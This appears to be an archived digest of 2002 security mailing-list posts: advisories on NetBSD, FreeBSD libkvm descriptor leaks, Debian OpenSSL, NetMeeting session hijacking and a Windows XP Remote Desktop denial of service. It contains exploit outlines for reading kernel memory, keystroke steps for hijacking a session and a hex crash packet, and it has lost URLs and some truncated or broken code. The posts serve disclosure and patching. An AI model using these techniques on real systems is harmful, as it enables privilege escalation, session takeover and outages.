Otherwise, kernel sources must be updated and a new kernel built and
installed.  Once the kernel sources have been updated, rebuild the
kernel, install it, and reboot.  For more information on how to do
this, see:

The instructions for updating your kernel sources depend upon which
particular NetBSD release you are running.

* NetBSD-current:

Systems running NetBSD-current dated from before 2002-07-21
should be upgraded to NetBSD-current dated 2002-07-22 or later.

The following directories need to be updated from the
netbsd-current CVS branch (aka HEAD):

Alternatively, apply the following patch (with potential offset

To patch:
# cd src/sys
# patch  /path/to/SA2002-007-tiocsctty.patch

Configure, compile, install and boot a new kernel according to
the instructions at: 

* NetBSD 1.6 beta:

Systems running NetBSD 1.6 BETAs and Release Candidates should
be upgraded to the NetBSD 1.6 release.

If a source-based point upgrade is required, sources from the
NetBSD-1.6 branch dated 2002-07-23 or later should be used.

The following directories need to be updated from the
netbsd-1-6 CVS branch:

Alternatively, apply the following patch (with potential offset

To patch:
# cd src/sys
# patch  /path/to/SA2002-007-tiocsctty.patch


iDEFENSE Security Advisory 09.16.2002: FreeBSD Ports libkvm Security Vulnerabilities

2002-09-17 Thread David Endler

iDEFENSE Security Advisory 09.16.2002 
FreeBSD Ports libkvm Security Vulnerabilities


The FreeBSD ports asmon, ascpu, bubblemon, wmmon, and wmnet2 
can be locally manipulated to take advantage of open file 
descriptors /dev/mem and /dev/kmem to gain root privileges on 
a target host. These five programs are installed setgid kmem 
by default. They will drop kmem privileges before executing 
user specified commands but file descriptors to /dev/mem and 
/dev/kmem will remain open. This can lead to a local root 
compromise in various ways (e.g. if an attacker chooses to 
scan for the master password file in the Linux kernel memory).


The latest versions of all five above mentioned FreeBSD ports 
are vulnerable, the following examples illustrate the 

bash-2.05a$ bubblemon dummy/usr/local/sbin/lsof|grep 
dummy|grep mem

dummy 688 dim 4r VCHR 2,0 0t0 21146 /dev/mem
dummy 688 dim 5r VCHR 2,1 0xc040f54c 21145 /dev/kmem

bash-2.05a$ ascpu -exe dummy/usr/local/sbin/lsof|grep dummy|grep

dummy 650 dim 4r VCHR 2,0 0t0 21146 /dev/mem
dummy 650 dim 5r VCHR 2,1 0xc040f54c 21145 /dev/kmem

bash-2.05a$ cat .wmmonrc 
left /home/dim/dummy 
bash-2.05a$ wmmon  
[1] 793 
bash-2.05a$ Monitoring 5 devices for activity. 
current stat is :1 

bash-2.05a$ /usr/local/sbin/lsof |grep dummy|grep mem 
dummy 797 dim 3r VCHR 2,0 0t0 21146 /dev/mem 
dummy 797 dim 4r VCHR 2,1 0xc040f54c 21145 /dev/kmem 

bash-2.05a$ wmnet2 -e dummy/usr/local/sbin/lsof|grep 
dummy|grep mem
wmnet: using kmem driver to monitor ec0
dummy 584 dim 3r VCHR 2,0 0t0 21146 /dev/mem
dummy 584 dim 4r VCHR 2,1 0xc037cb8f 21145 /dev/kmem 

One possible exploit for these vulnerabilities is to replace 
getch() in strings(1) with: 

int getch() 
char buf[4];
return buf[0];

or a similar less CPU expensive function that reads a 
character from the /dev/mem file descriptor and execute the 

wmnet2 -e exploit|grep root|grep Charlie 


The latest copies of asmon, ascpu, bubblemon, wmmon, and 
wmnet2 from the FreeBSD ports collection are vulnerable and 
were tested on 4.6-RELEASE of FreeBSD.  According to FreeBSD, 
all FreeBSD ports that use libkvm prior to and including 
4.6.2-RELEASE may also be vulnerable.


Remove the setgid bit on the affected applications, 
however reducing the functionality:

chmod g-s / 


The FreeBSD advisory to be released in coordination with this 
advisory is FreeBSD-SA-02:39.libkvm.  FreeBSD has provided
the following patch details:

Upgrade your vulnerable system to 4.6-STABLE; or to the 
RELENG_4_6, RELENG_4_5, or RELENG_4_4 security branch dated 
after the correction date (4.6.2-RELEASE-p2, 4.5-RELEASE-p20, 
or 4.4-RELEASE-p27).


August 12, 2002 - Disclosed to iDEFENSE
September 6, 2002 - Disclosed to FreeBSD Security
September 6, 2002 - Disclosed to iDEFENSE clients
September 16, 2002 - Coordinated public disclosure by FreeBSD
  and iDEFENSE


This issue was exclusively disclosed to iDEFENSE by 

David Endler, CISSP
Director, Technical Intelligence
14151 Newbrook Drive
Suite 100
Chantilly, VA 20151
voice: 703-344-2632
fax: 703-961-1071


[SECURITY] [DSA-136-2] Multiple OpenSSL problems (update)

2002-09-17 Thread Michael Stone


Debian Security Advisory DSA-136-2   [EMAIL PROTECTED] Stone
September 15, 2002

Package: openssl094, openssl095, openssl
Problem type   : multiple remote exploits
Debian-specific: no
CVE: CAN-2002-0655 CAN-2002-0656 CAN-2002-0657 CAN-2002-0659

Note: this advisory is an update to DSA-136-1, issued 30 Jul 2002. It
includes ASN1 updates in the woody packages, plus the potato packages
which were not initially available.

The OpenSSL development team has announced that a security audit by A.L.
Digital Ltd and The Bunker, under the DARPA CHATS program, has revealed
remotely exploitable buffer overflow conditions in the OpenSSL code.
Additionaly, the ASN1 parser in OpenSSL has a potential DoS attack
independently discovered by Adi Stav and James Yonan.

CAN-2002-0655 references overflows in buffers used to hold ASCII
representations of integers on 64 bit platforms. CAN-2002-0656
references buffer overflows in the SSL2 server implementation (by
sending an invalid key to the server) and the SSL3 client implementation
(by sending a large session id to the client). The SSL2 issue was also
noticed by Neohapsis, who have privately demonstrated exploit code for
this issue. CAN-2002-0659 references the ASN1 parser DoS issue.

These vulnerabilities have been addressed for Debian 3.0 (woody) in
openssl094_0.9.4-6.woody.1, openssl095_0.9.5a-6.woody.1 and

These vulnerabilities are also present in Debian 2.2 (potato). Fixed
packages are available in openssl094_0.9.4-6.potato.0 and

Only i386 packages for openssl094 and openssl095 are available at this
time; other architectures will be made available as soon as possible.

A worm is actively exploiting this issue on internet-attached hosts;
we recommend you upgrade your OpenSSL as soon as possible. Note that you
must restart any daemons using SSL. (E.g., ssh or ssl-enabled apache.)
If you are uncertain which programs are using SSL you may choose to
reboot to ensure that all running daemons are using the new libraries.


Obtaining updates:

  By hand:
wget URL
will fetch the file for you.
dpkg -i FILENAME.deb
will install the fetched file.

  With apt:
deb stable/updates main
added to /etc/apt/sources.list will provide security updates

Additional information can be found on the Debian security webpages


Debian 2.2 (potato)
- --

  Oldstable was released for alpha, arm, i386, m68k, powerpc and sparc.

  Source archives:
  Size/MD5 checksum:  2153980 c8261d93317635d56df55650c6aeb3dc
  Size/MD5 checksum:  1570392 72544daea16d6c99d656b95f77b01b2d
  Size/MD5 checksum:  741 9c7e0cf669a32763f4bf9669156a2235
  Size/MD5 checksum:  702 463aa33d08d188542208e82734269eab
  Size/MD5 checksum:44354 d06b01d6f91e901d3e2686df4b9b6bc6
  Size/MD5 checksum:42566 ea23bd132febccb20178a33080a75b2e

  alpha architecture (DEC Alpha)
  Size/MD5 checksum:   746626 c7e28cd9327bf7c57de8460873acc7ca
  Size/MD5 checksum:   591014 6e50b6aab7330ab8bf05835476e355cf
  Size/MD5 checksum:  1550550 519f58912d6fe231127dc3269235494b

  arm architecture (ARM)
  Size/MD5 checksum:   469664 291969d97b32582ad427f2464a5f9f50
  Size/MD5 checksum:  1349424 61b9f52a86711594c7f9e7135e2ad447

NetMeeting 3.01 Local RDS Session Hijacking

2002-09-17 Thread Paul A Roberts

In comparing findings with the Microsoft NetMeeting 3.0 Security Assessment
and Configuration Guide
available through the National Security Agency web site ( in the
Security Recommendation Guides
section), I noticed a discrepancy in findings. The guide indicated the
Screen Saver Protection feature
did not work as advertised allowing someone to view the remote user's
activity but not use the host system.
It is possible to hijack the local session given physical access. I
appreciate the NSA's timely addition
to the guide to include the 'unconfirmed' RDS Hijacking warning and
stressing the point that physical
security for the host computer is paramount.


Let us know who you are:

Name: Paul A Roberts
Phone: (503)581-1881 / (503)945-6443

Affiliation and address: Oregon Department of Human Services
Network  Desktop Services
5th Floor
500 Summer St. NE
Salem, OR 97301

Have you reported this to the vendor? YES

If so, please let us know whom you've contacted:

Date of your report : 10/03/01
Vendor contact name : Scott
Vendor contact phone :
Vendor contact e-mail : [EMAIL PROTECTED]
Vendor reference number : [msrc 899sc]

If not, we encourage you to do so--vendors need to hear about
vulnerabilities from you as a customer.


We encourage communication between vendors and their customers. When
we forward a report to the vendor, we include the reporter's name and
contact information unless you let us know otherwise.
If you want this report to remain anonymous, please check here:
___ Do not release my identity to your vendor contact.


If there is a CERT Vulnerability tracking number please put it
here (otherwise leave blank): VU#__.
Please describe the vulnerability.
What is the impact of this vulnerability?

a) What is the specific impact:

The NetMeeting 3.01 Remote Desktop Sharing (RDS) Screen Saver Protection
option is designed
to prevent a local user from taking control of the host workstation without
proper authentication.
The remote session can be hijacked at the host giving the hijacker the
authenticated local and
network privileges of the remote user.

b) How would you envision it being used in an attack scenario:

An individual with physical access to the RDS host system, such as in an
environment, could hijack an active session to gain local or network
administration privileges
from a remote user.

To your knowledge is the vulnerability currently being exploited?


If there is an exploitation script available, please include it here.

Sample Exploit:

When a Windows NT, 2000, or XP system is being controlled remotely by the
NetMeeting RDS service
a local user can execute the following:

(1) Hijacker monitors the RDS session at the local RDS host screen until the
remote user makes a
change to a document or setting (i.e., opening Notepad and typing text).

(2) Hijacker uses the following sequence (keys vary slightly between OS):
CTRL-ALT-DEL, 'shut down',
'Okay', ESC. (Effectively starting a logoff of the session and grabbing
control from the authorized
remote user.)

(3) Hijacker has local keyboard control and the Do you want to save the
changes? box is displayed.

(4) Hijacker uses the 'Cancel' button to abort the logoff.

(5) Screensaver may briefly appear or the desktop background only may
appear. Pressing CTRL-ALT-DEL
followed by the ESC key at this point gives the hijacker full control of the
system with the remote
user's credentials. (The remote user still may view the session until
disconnected or the program is
exited, however, cannot take control of the session back from the hijacker.)

Do you know what systems and/or configurations are vulnerable?
YES (If yes, please list them below)

System: Microsoft NetMeeting 3.01 through latest Spk2 (4.4.3396)
OS version: Windows NT 4.0 Spk6, Windows 2000 Spk3, Windows XP Professional
Verified/Guessed: Verified

Are you aware of any workarounds and/or fixes for this vulnerability?

NO (If you have a workaround or are aware of patches
please include the information here.)

Is there anything else you would like to tell us?

This vulnerability was first reported to Microsoft in October of 2001 and a
fix was said
to be coming in the next service pack. In a follow-up in March of 

Analysis of Modap worm

2002-09-17 Thread Mario van Velzen


We have completed and released our analysis of the Modap worm, which has
been targeting Apache Web servers running vulnerable versions of OpenSSL.

In addition, we have also released to the public our initial Incident
Alert on this issue, available at:

The full analysis is available at:

If you have any comments or concerns, please do not hesitate to contact


Mario Van Velzen, [EMAIL PROTECTED]
DeepSight Threat Management System, Symantec

FreeBSD Security Advisory FreeBSD-SA-02:39.libkvm

2002-09-17 Thread FreeBSD Security Advisories


FreeBSD-SA-02:39.libkvm Security Advisory
  The FreeBSD Project

Topic:  Applications using libkvm may leak sensitive descriptors

Category:   core
Module: libkvm
Announced:  2002-09-16
Credits:David Endler [EMAIL PROTECTED],
Affects:All releases prior to and including 4.6.2-RELEASE.
Security branch releases prior to 4.4-RELEASE-p27,
4.5-RELEASE-p20, and 4.6.2-RELEASE-p2.
Corrected:  2002-09-13 14:53:43 UTC (RELENG_4)
2002-09-13 15:04:22 UTC (RELENG_4_6)
2002-09-13 15:07:26 UTC (RELENG_4_5)
2002-09-13 15:09:07 UTC (RELENG_4_4)
FreeBSD only:   NO

I.   Background

The kvm(3) library provides a uniform interface for accessing kernel
virtual memory images, including live systems and crash dumps.  Access
to live systems is via /dev/mem and /dev/kmem.  Memory can be read and
written, kernel symbol addresses can be looked up efficiently, and
information about user processes can be gathered.

The kvm_openfiles(3) function opens the special device files /dev/mem
and /dev/kmem, and returns an opaque handle that must be passed
to the other library functions.

II.  Problem Description

Applications that wish to present system information such as swap
utilization, virtual memory utilization, CPU utilization, and
so on may use the kvm(3) library to read kernel memory directly
and gather this information.  Such applications typically must
be run set-group-ID kmem so that the call to kvm_openfiles(3)
can access /dev/mem and /dev/kmem.

If the application then uses exec(2) to start another application,
the new application will continue to have open file descriptors to
/dev/mem and /dev/kmem.  This is usually avoided by marking file
descriptors as close-on-exec, but since the handle returned by
kvm_openfiles(3) is opaque, there is no direct way for the application
to determine what file descriptors have been opened by the library.
As a result, application writers may neglect to take these file
descriptors into account.

III. Impact

Set-group-ID kmem applications which use kvm(3) and start other
applications may leak /dev/mem and /dev/kmem file descriptors.  If
those applications can be specified by a local user, they may be
used to read kernel memory, resulting in disclosure of sensitive
information such as file, network, and tty buffers, authentication
tokens, and so on.

Several applications in the FreeBSD Ports Collection were identified
that are affected: asmon, ascpu, bubblemon, wmmon, and wmnet2.  There
may be other applications as well.

IV.  Workaround

Remove the set-group-ID bit on affected applications.  This will
result in the applications losing some functionality.

V.   Solution

Do one of the following:

1) Upgrade your vulnerable system to 4.6-STABLE; or to the RELENG_4_6,
RELENG_4_5, or RELENG_4_4 security branch dated after the correction
date (4.6.2-RELEASE-p2, 4.5-RELEASE-p20, or 4.4-RELEASE-p27).

2) To patch your present system:

The following patch has been verified to apply to FreeBSD 4.4, FreeBSD
4.5, FreeBSD 4.6, and FreeBSD 4.6.2 systems.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch
# fetch

b) Execute the following commands as root:

# cd /usr/src
# patch  /path/to/patch
# cd /usr/src/lib/libkvm
# make depend  make  make install

VI.  Correction details

The following list contains the revision numbers of each file that was
corrected in FreeBSD.

Path Revision
- -
- -
Version: GnuPG v1.0.7 (FreeBSD)


Microsoft Windows XP Remote Desktop denial of service vulnerability

2002-09-17 Thread Ben Cohen


Microsoft Windows XP Professional
Microsoft Windows .NET Standard Server Beta 3


Microsoft Windows 2000 Server


Windows XP Professional has a remote denial of service attack when Remote
Desktop is enabled.  Remote Desktop is XP Professional's single-user RDP
server (Terminal Services).


At the start of the protocol there is a negotiation of client and server
graphics capabilities, in a packet called PDU Confirm Active.  A block of
32 bytes in this packet allows the client to disable the drawing commands
that it does not support.

One of these apparently controls whether the Pattern BLT command is sent.  
On Windows 2000 Server, disabling this command will make the server send
bitmaps instead of Pattern BLT commands.  However, Windows XP Professional
apparently reboots when it tries to render patterns; since this happens
while the login screen is being drawn, this does not require the client to
have logged on or authenticated to the server.  This applies to all
versions of the protocol tested (RDP 4.0, 5.0 and 5.1), and it is also
reproducible with Windows .NET Standard Server Beta 3.


Disable Remote Desktop (from Control Panel, System, Remote, Remote
Desktop, deselect the option Allow users to connect remotely to this


Shown below is the unencrypted packet contents for the problematic PDU
Confirm Active packet.  The only change is from 01 to 00 on the line

c4 01 13 00 f0 03 ea 03 01 00 ea 03 06 00 ae 01
4d 53 54 53 43 00 11 00 00 00 01 00 18 00 01 00
03 00 00 02 00 00 00 00 05 04 00 00 00 00 00 00
00 00 02 00 1c 00 08 00 01 00 01 00 01 00 00 05
00 04 00 00 01 00 01 00 00 00 01 00 00 00 03 00
58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 01 00 14 00 00 00 01 00 00 00
2a 00 01 00 01 01 01 00 00 01 01 01 00 01 00 00  - was 2a 00 01 01
00 01 01 01 01 01 01 01 01 00 01 01 01 00 00 00
00 00 a1 06 00 00 00 00 00 00 00 84 03 00 00 00
00 00 e4 04 00 00 13 00 28 00 01 00 00 03 78 00
00 00 78 00 00 00 f3 09 00 80 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00
08 00 06 00 00 00 07 00 0c 00 00 00 00 00 00 00
00 00 05 00 0c 00 00 00 00 00 02 00 02 00 08 00
0a 00 01 00 14 00 15 00 09 00 08 00 00 00 00 00
0d 00 58 00 05 00 08 00 09 08 00 00 04 00 00 00
00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 0c 00 08 00 01 00 00 00
0e 00 08 00 01 00 00 00 10 00 34 00 fe 00 04 00
fe 00 04 00 fe 00 08 00 fe 00 08 00 fe 00 10 00
fe 00 20 00 fe 00 40 00 fe 00 80 00 fe 00 00 01
40 00 00 08 00 01 00 01 03 00 00 00 0f 00 08 00
01 00 00 00 11 00 0c 00 01 00 00 00 00 0a 64 00
14 00 08 00 01 00 00 00 15 00 0c 00 01 00 00 00
00 0a 00 01


Section 8.2.5 from T.128 Multipoint application sharing, Series T: Terminals
for telematic services, ITU-T.

Microsoft was notified on 16 April 2002.


Ben Cohen

Skygate Technology Ltd.
+44 (0)20 8542 7856

Re: Bug in Opera and Konqueror

2002-09-17 Thread Dirk Mueller

On Son, 15 Sep 2002, Zeux wrote:

 the version is present in all earlier versions. My version of Konqueror
 is out of date, and I do not have the recent release of it, so I will be
 glad if somebody tests this vulnerability and reports me the results.

Konqueror as of KDE 3.0.1 or newer is not vulnerable. 

 The creators of the packet did not even check the presence of this vulnerability
 on the new browser, so I ask you to check it on the Konqueror from KDE3.

They did, you just received an automatic reply that was generated when the 
bug was closed. 

BTW, please report security issues to [EMAIL PROTECTED], thanks. 

Dirk (received 1223 mails today)